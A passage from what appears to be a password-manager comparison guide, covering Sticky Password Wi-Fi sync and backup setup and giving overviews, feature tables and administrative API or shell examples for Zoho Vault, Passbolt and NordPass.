# ── Sticky Password — Wi-Fi sync configuration and verification ─────────────── # Configure Wi-Fi-only sync (disable cloud sync) # Settings > Sync & Backup > Synchronisation Mode: Wi-Fi Only # Cloud Sync: DISABLED # Wi-Fi discovery: Automatic (mDNS/Bonjour on local subnet) # Verify no cloud connections during sync (network capture) tcpdump -i eth0 -nn host stickypassword.com # Expected result: 0 packets (zero connection to Sticky Password servers) # Confirm sync is device-to-device only tcpdump -i eth0 -nn 'udp port 5353 or tcp portrange 49152-65535' # Shows: mDNS device discovery + encrypted TCP between local devices only # ── Create encrypted local backup ───────────────────────────────────────────── # Settings > Backup > Create Backup # Destination: \\NAS\Attorneys\VaultBackups\%USERNAME%\vault_%date%.spd # Encryption: AES-256 with separate backup password (stored in firm safe) # Schedule: Daily at 23:00 # ── Portable USB deployment for courthouse use ──────────────────────────────── # Download: stickypassword.com/portable # Install on VeraCrypt-encrypted USB drive: # E:\StickyPassword\StickyPassword.exe # Vault location: E:\StickyPassword\Data\StickyPassword.sdb # (USB encrypted with AES-256; all data requires USB passphrase to access) # ── Enterprise MSI deployment (Sticky Password Enterprise) ─────────────────── msiexec /i StickyPasswordEnterprise.msi /quiet /norestart \ SYNC_MODE=wifi \ CLOUD_SYNC=0 \ SERVER_URL=https://spenterprise.lawfirm.local \ LICENSEKEY=XXXXX-XXXXX-XXXXX-XXXXX # Post-deployment: confirm Wi-Fi-only mode across fleet # Group Policy preference: HKCU\Software\StickyPassword\SyncMode = WiFiOnly
Overview
Zoho Vault is an enterprise password manager and privileged access management solution from Zoho Corporation, deeply integrated with the broader Zoho business application suite (CRM, Desk, Mail, Analytics) and tightly connected to third-party identity providers. Zoho Vault uses AES-256 encryption with a zero-knowledge model and provides one of the most granular role-based access control systems available in a password manager — administrators can define custom roles with per-vault, per-folder, per-secret, and per-operation permissions (read, write, share, delete, manage) rather than being limited to predefined role tiers.
Zoho Vault’s time-limited secret sharing is a particularly valuable enterprise capability: administrators or users can share specific credentials with internal users or external parties for a precisely defined time window — Zoho Vault automatically revokes access at the expiry time without any administrator action. Combined with a comprehensive audit trail that logs every access, modification, sharing event, and policy change with timestamp, user identity, IP address, and device, Zoho Vault provides the accountability and access control granularity required by managed service providers, contractors with temporary system access, and organisations subject to strict privileged-access governance requirements.
Key Features & Components
| Feature / Component | Description |
|---|---|
| Granular Per-Secret RBAC | Custom roles with per-vault, per-folder, and per-secret read/write/share/delete permissions — true least-privilege access to specific credential categories. |
| Time-Limited Secret Sharing | Share individual credentials for a defined time window — access automatically revoked at expiry; ideal for contractor access, support tickets, and temporary project grants. |
| SAML/OIDC SSO Integration | Native SSO with Okta, Azure AD, Onelogin, Google Workspace, and any SAML 2.0 or OIDC-compatible identity provider — no separate Zoho credentials required. |
| In-App Credential Rotation | One-click rotation for Linux SSH, Windows, MySQL, MSSQL, and PostgreSQL service accounts — new credentials generated, applied, and audit-logged automatically. |
| Comprehensive Audit Trail | Every vault event logged with timestamp, user identity, source IP, and device — exportable via Splunk/SIEM webhooks or direct connector for compliance and incident investigation. |
| Emergency Takeover | Administrators can assume ownership of a departed employee’s vault — preventing corporate secrets from being permanently inaccessible when an employee leaves abruptly. |
Use Case Demonstration
# ── Zoho Vault REST API — automated time-limited secret sharing ───────────────
# Step 1: Authenticate (OAuth2 client credentials)
ACCESS_TOKEN=$(curl -X POST \
'https://accounts.zoho.com/oauth/v2/token' \
-d 'grant_type=client_credentials&client_id=CLIENT_ID
&client_secret=CLIENT_SECRET
&scope=ZohoVault.secrets.READ,ZohoVault.secrets.CREATE,
ZohoVault.secrets.UPDATE,ZohoVault.users.READ' \
| python3 -c "import sys,json;print(json.load(sys.stdin)['access_token'])")
# Step 2: Create a credential secret for client RDP server
SECRET_ID=$(curl -X POST \
'https://vault.zoho.com/api/v1/secrets' \
-H "Authorization: Zoho-oauthtoken $ACCESS_TOKEN" \
-H 'Content-Type: application/json' \
-d '{
"secretname": "ClientABC_RDP_Server01",
"password": "C1ientABC!RDP2024",
"username": "admin",
"ipaddress": "10.50.0.10",
"description":"Ticket #TKT-2024-0847"
}' | python3 -c "import sys,json;
print(json.load(sys.stdin)['operation']['secret']['secretid'])")
# Step 3: Share with support engineer — 4-hour window, read-only
curl -X POST \
"https://vault.zoho.com/api/v1/secrets/$SECRET_ID/share" \
-H "Authorization: Zoho-oauthtoken $ACCESS_TOKEN" \
-H 'Content-Type: application/json' \
-d '{
"emails": ["engineer@msp.com"],
"expiry": "2024-06-17T18:00:00+00:00",
"permission": "READ_ONLY"
}'
# Step 4: Retrieve audit log for this secret (shows all access events)
curl "https://vault.zoho.com/api/v1/secrets/$SECRET_ID/auditlog" \
-H "Authorization: Zoho-oauthtoken $ACCESS_TOKEN"
# Step 5: Emergency takeover of departed engineer's vault
curl -X POST 'https://vault.zoho.com/api/v1/takeover' \
-H "Authorization: Zoho-oauthtoken $ACCESS_TOKEN" \
-d '{"email":"departed.engineer@corp.com"}'
Overview
Passbolt is a free, open-source, self-hosted team password manager built specifically for IT teams, developers, and security-aware organisations rather than individual consumers. Its most fundamental architectural distinction from other password managers is the use of end-to-end encryption based on individual OpenPGP (GnuPG) key pairs: each user maintains their own PGP key pair, and every secret stored in Passbolt is encrypted individually with each authorised user’s public key. When a secret is shared with a team of five, it is encrypted five times — once per recipient’s public key. Even Passbolt server administrators cannot read any user’s secrets, because the private key required for decryption is held only on the user’s device.
Passbolt is available as a Community Edition (fully open-source on GitHub) and a Pro Edition (adding LDAP/AD sync, SSO via SAML, audit logs, and shared folder management for teams). The REST API provides comprehensive programmatic access for automating secret lifecycle management — creating, retrieving, sharing, updating, and deleting secrets without using the web interface. Passbolt’s architecture is designed ground-up for collaborative team use: the web UI, browser extensions (Chrome, Firefox, Edge), and CLI all operate seamlessly within the same PGP-encrypted framework, providing the same end-to-end security model regardless of access method.
Key Features & Components
| Feature / Component | Description |
|---|---|
| PGP Key-Per-User End-to-End Encryption | Every secret encrypted individually with each authorised user’s PGP public key — compromising one user’s key cannot expose any other user’s secrets; zero-knowledge even for server admins. |
| Fully Self-Hosted | Deployable on-premises or in private cloud via Docker or bare-metal installation — no external dependencies; complete data sovereignty and infrastructure control. |
| Team Folders and Group Access Control | Shared password folders with group-based access control — separate silos for IT, DBA, DevOps, and other teams; folder permissions inherited by all members of the assigned group. |
| LDAP/AD Integration (Pro) | Automatic user provisioning and deprovisioning from Active Directory or LDAP — accounts removed from AD immediately lose Passbolt vault access. |
| Comprehensive REST API | Full API coverage for secret and folder CRUD operations, user management, sharing, and audit log retrieval — enables automation of complete credential lifecycle workflows. |
| Browser Extensions (Chrome, Firefox, Edge) | Seamless in-browser autofill for saved credentials — same UX as commercial alternatives while maintaining the self-hosted, PGP-encrypted architecture. |
Use Case Demonstration
# ── Passbolt Docker Compose deployment ────────────────────────────────────────
cat > docker-compose.yml << 'EOF'
services:
passbolt:
image: passbolt/passbolt:latest-ce
restart: unless-stopped
environment:
APP_FULL_BASE_URL: https://passbolt.corp.local
DATASOURCES_DEFAULT_HOST: db
DATASOURCES_DEFAULT_DATABASE: passbolt
DATASOURCES_DEFAULT_USERNAME: passbolt_user
DATASOURCES_DEFAULT_PASSWORD: SecureDBPass2024!
EMAIL_TRANSPORT_DEFAULT_HOST: smtp.corp.local
PASSBOLT_REGISTRATION_PUBLIC: 'false'
volumes:
- gpg_volume:/etc/passbolt/gpg
- jwt_volume:/etc/passbolt/jwt
ports: ['443:443', '80:80']
db:
image: mariadb:10.11
environment:
MYSQL_ROOT_PASSWORD: RootSecure2024!
MYSQL_DATABASE: passbolt
MYSQL_USER: passbolt_user
MYSQL_PASSWORD: SecureDBPass2024!
volumes: { gpg_volume: {}, jwt_volume: {} }
EOF
docker compose up -d
# ── CLI — identify and rotate credentials after employee departure ─────────────
# List secrets the departed user had access to
curl 'https://passbolt.corp.local/resources.json?
filter[is-shared-with-user]=DEPARTED_USER_UUID' \
-H 'Authorization: Bearer API_TOKEN' \
| python3 -c "
import sys, json
resources = json.load(sys.stdin)['body']
print(f'Credentials to rotate after departure: {len(resources)}')
[print(f' {r[\"name\"]}') for r in resources]"
# Rotate each credential (generate new password + update PGP-encrypted record)
NEW_PASS=$(openssl rand -base64 24 | tr -d '+/=')
curl -X PUT 'https://passbolt.corp.local/resources/RESOURCE_UUID.json' \
-H 'Authorization: Bearer API_TOKEN' \
-H 'Content-Type: application/json' \
-d '{"secrets":[{"user_id":"ADMIN_UUID",
"data":"[PGP-encrypted new password for each remaining team member]"}]}'
# Retrieve audit log for incident documentation
curl 'https://passbolt.corp.local/action-logs.json?foreign_model=Resource' \
-H 'Authorization: Bearer API_TOKEN'
Overview
NordPass is a password manager from Nord Security — the company behind NordVPN, NordLocker, and NordLayer — that differentiates through its use of the XChaCha20 encryption algorithm with Argon2id key derivation. XChaCha20 is a modern, high-performance authenticated stream cipher (an extended-nonce variant of ChaCha20) that delivers 256-bit security equivalent to AES-256 while outperforming AES on devices lacking hardware AES acceleration, such as older mobile phones and embedded systems. Argon2id won the Password Hashing Competition in 2015 and is considered the current gold-standard key derivation function for memory-hard password hashing.
NordPass Business provides an admin console for team management, MFA enforcement, SAML 2.0 SSO integration (Azure AD, Google Workspace, Okta), activity monitoring, company-wide password health reporting, and group-based vault sharing with configurable permissions. NordPass integrates with NordStellar to offer email masking — generating disposable email aliases that forward to the real address — reducing phishing exposure and enabling breach attribution to the specific service where the masked address was used. Full FIDO2 passkey support positions NordPass for the next generation of passwordless authentication workflows.
Key Features & Components
| Feature / Component | Description |
|---|---|
| XChaCha20 + Argon2id Cryptography | Modern XChaCha20 authenticated stream cipher (256-bit security) with Argon2id key derivation — independently audited by Cure53; outperforms AES on devices without hardware acceleration. |
| FIDO2 Passkey Storage & Authentication | Creates, stores, and uses FIDO2 passkeys for passwordless login at supporting websites — using device biometrics as the authentication factor. |
| Email Masking (NordStellar) | Generates per-service disposable email aliases forwarding to the real address — limits phishing exposure and enables breach attribution without exposing the primary email. |
| Data Breach Scanner | Continuously scans 30-plus billion breach records — alerts users and admins when stored credentials appear in any published data breach dataset. |
| Admin Console & Group Policies | User provisioning, group-based vault sharing, MFA enforcement, SSO configuration, sharing restriction policies, and comprehensive activity logging for business deployments. |
| Zero-Knowledge & Cure53 Audited | All encryption and decryption client-side; independently audited by Cure53 in 2020 and 2023 — transparent cryptographic verification of zero-knowledge claims. |
Use Case Demonstration
# ── NordPass Business — Admin Console and API configuration ──────────────────
# SAML 2.0 SSO with Azure AD
# Admin Console > Security > Single Sign-On
# Identity Provider: Azure Active Directory
# Entity ID: https://app.nordpass.com/sp
# ACS URL: https://app.nordpass.com/saml/callback
# Certificate: [downloaded from Azure AD Enterprise App]
# Attribute mappings:
# email -> user.userprincipalname
# firstName -> user.givenname
# lastName -> user.surname
# department -> user.department
# Create engagement team groups
# Admin Console > Groups > Create Group
# Groups: ClientABC_Team | ClientXYZ_Team | Management | AllConsultants
# Share client credential vault with engagement team (read-only)
# Admin Console > Shared Vault > ClientABC_Credentials
# Share with: ClientABC_Team | Permission: View Only
# (engineers can use credentials but not export or copy to personal vault)
# Query organisation vault health via API
curl -H 'Authorization: Bearer BUSINESS_API_TOKEN' \
'https://api.nordpass.com/v1/business/organization/health' \
| python3 -c "
import sys, json
health = json.load(sys.stdin)
print(f'Weak passwords: {health[\"weak_passwords_count\"]}')
print(f'Reused passwords: {health[\"reused_passwords_count\"]}')
print(f'Breach alerts active: {health[\"breached_items_count\"]}')"
# Remove consultant from engagement team (project closure)
curl -X DELETE \
'https://api.nordpass.com/v1/business/groups/CLIENTABC_GID/members/MEMBER_UUID' \
-H 'Authorization: Bearer BUSINESS_API_TOKEN'
# Access to ClientABC_Credentials vault revoked immediately
# Export engagement activity log for client audit deliverable
curl -H 'Authorization: Bearer BUSINESS_API_TOKEN' \
'https://api.nordpass.com/v1/business/audit-log?
from=2024-01-01&to=2024-06-17&group=CLIENTABC_GID'
References
- Tenable — Nessus Documentation & API Reference — docs.tenable.com/nessus
- Qualys — VMDR Documentation & API Guide — qualysguard.qg2.apps.qualys.com
- Invicti Security — Acunetix Documentation & REST API — acunetix.com/support/docs
- Rapid7 — InsightVM API Documentation — docs.rapid7.com/insightvm/api-v3
- BeyondTrust — Retina Network Security Scanner — beyondtrust.com/support
- GFI Software — LanGuard Documentation — gfi.com/support/lanGuard
- Rapid7 — Nexpose Security Console Documentation — docs.rapid7.com/nexpose
- OpenSCAP Project — OpenSCAP Documentation — open-scap.org/documentation
- HCL Technologies — AppScan Documentation — help.hcl-software.com/appscan
- Fortra — Core Impact Documentation — coresecurity.com/core-impact
- LastPass — LastPass Admin Guide — support.lastpass.com
- Dashlane — Dashlane Business API Reference — developer.dashlane.com
- 1Password — 1Password CLI and API Docs — developer.1password.com
- Bitwarden — Bitwarden Help Centre — bitwarden.com/help
- Keeper Security — Keeper Enterprise Documentation — docs.keeper.io
- Siber Systems — RoboForm Enterprise Administration — roboform.com/help
- Lamantine Software — Sticky Password Documentation — stickypassword.com/help
- Zoho Corporation — Zoho Vault API Reference — zoho.com/vault/api
- Passbolt — Passbolt Documentation & API — passbolt.com/docs
- Nord Security — NordPass Business Help — support.nordpass.com
- NIST — SP 800-115: Technical Guide to Information Security Testing — csrc.nist.gov
- OWASP — OWASP Testing Guide v4.2 — owasp.org/www-project-web-security-testing-guide
- MITRE — CVE and NVD Vulnerability Database — nvd.nist.gov
- CIS — CIS Benchmarks — cisecurity.org/cis-benchmarks
- DISA — DISA STIG Library — public.cyber.mil/stigs